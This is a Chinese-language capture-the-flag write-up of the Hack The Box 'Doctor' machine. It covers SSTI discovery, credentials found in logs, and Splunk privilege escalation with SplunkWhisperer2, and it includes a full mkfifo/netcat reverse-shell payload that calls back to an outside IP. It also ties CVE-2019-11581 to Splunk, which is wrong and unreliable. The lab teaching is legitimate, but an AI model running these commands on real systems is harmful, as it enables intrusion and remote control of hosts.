Doctor靶机渗透测试报告：SSTI与Splunk权限提升<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用Nmap进行扫描发现以下开放端口：<\/p>

22\/tcp<\/strong>：OpenSSH 8.2p1 (Ubuntu Linux)<\/li>
80\/tcp<\/strong>：Apache httpd 2.4.41 (Ubuntu)<\/li>

8089\/tcp<\/strong>：Splunkd httpd (SSL证书显示为SplunkServerDefaultCert)<\/li> <\/ul>
1.2 Web服务枚举<\/h3>

添加hosts记录：echo '10.10.10.209 doctors.htb'>>\/etc\/hosts<\/code><\/li>
使用whatweb识别网站技术：whatweb http:\/\/doctors.htb\/login -v<\/code><\/li>
发现以下关键端点： \/login<\/code><\/li> \/register<\/code><\/li> \/post\/new<\/code><\/li> \/archive<\/code><\/li> <\/ul> <\/li> <\/ul> 2. SSTI漏洞利用<\/h2> 2.1 漏洞发现<\/h3> 在\/archive<\/code>端点测试模板注入：<\/p> 输入${7*7}<\/code>无反应<\/li> 输入{{8*8}}<\/code>返回64，确认存在服务器端模板注入(SSTI)漏洞<\/li> 输入{{9*'9'}}<\/code>返回81，进一步确认<\/li> <\/ul> 2.2 利用方法<\/h3> 通过SSTI漏洞可以执行任意Python代码<\/li> 构造恶意payload获取反向shell或读取敏感文件<\/li> <\/ol> 3. 用户权限获取<\/h2> 3.1 密码发现<\/h3> 在系统日志中搜索密码：<\/p> grep -R -e 'password'<\/span> \/var\/log\/ 2>\/dev\/null <\/span><\/span><\/code><\/pre>发现凭据：<\/p> 用户名：shaun<\/li> 密码：Guitar123<\/li> <\/ul> 3.2 用户登录<\/h3> 使用发现的凭据切换用户：<\/p> su shaun <\/span><\/span><\/code><\/pre>成功获取用户权限，找到user flag：<\/p> 89d2e206dac3a780e4859ba394f419b5 <\/code><\/pre> 4. 权限提升：Splunk漏洞利用<\/h2> 4.1 Splunk服务发现<\/h3> 检查运行的Splunk服务：<\/p> ps -aux | grep splunk <\/span><\/span><\/code><\/pre>4.2 利用SplunkWhisperer2工具<\/h3> 克隆利用工具：<\/li> <\/ol> git clone https:\/\/github.com\/cnotin\/SplunkWhisperer2 <\/span><\/span>cd SplunkWhisperer2\/PySplunkWhisperer2 <\/span><\/span><\/code><\/pre> 测试漏洞：<\/li> <\/ol> python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --payload id <\/span><\/span><\/code><\/pre> 使用已获取的凭据执行命令：<\/li> <\/ol> python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.16.6 --username shaun --password Guitar123 --payload id <\/span><\/span><\/code><\/pre> 获取反向shell：<\/li> <\/ol> python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.16.6 --username shaun --password Guitar123 --payload 'rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 10.10.16.6 10033 >\/tmp\/f'<\/span> <\/span><\/span><\/code><\/pre>4.3 获取root权限<\/h3> 成功获取root shell后，找到root flag：<\/p> 2f93ef26f3fd15a56c09311850459979 <\/code><\/pre> 5. 关键知识点总结<\/h2> SSTI漏洞检测<\/strong>：<\/p> 使用{{7*7}}<\/code>等表达式测试模板注入<\/li> 确认漏洞后构造恶意payload执行系统命令<\/li> <\/ul> <\/li> 日志文件检查<\/strong>：<\/p> \/var\/log\/<\/code>目录常包含敏感信息<\/li> 使用grep搜索密码等关键词<\/li> <\/ul> <\/li> Splunk权限提升<\/strong>：<\/p> Splunk默认运行在8089端口<\/li> SplunkWhisperer2工具可滥用Splunk的脚本功能执行系统命令<\/li> 需要有效凭据才能利用(CVE-2019-11581)<\/li> <\/ul> <\/li> 反向shell构造<\/strong>：<\/p> 使用mkfifo创建命名管道<\/li> 结合netcat建立反向连接<\/li> <\/ul> <\/li> <\/ol> 6. 防御建议<\/h2> 针对SSTI<\/strong>：<\/p> 对用户输入进行严格过滤<\/li> 使用安全的模板引擎配置<\/li> <\/ul> <\/li> 针对Splunk<\/strong>：<\/p> 及时更新Splunk到最新版本<\/li> 限制Splunk服务的网络访问<\/li> 实施严格的权限控制<\/li> <\/ul> <\/li> 通用安全措施<\/strong>：<\/p> 避免在日志中记录敏感信息<\/li> 实施最小权限原则<\/li> 定期进行安全审计和渗透测试<\/li> <\/ul> <\/li> <\/ol>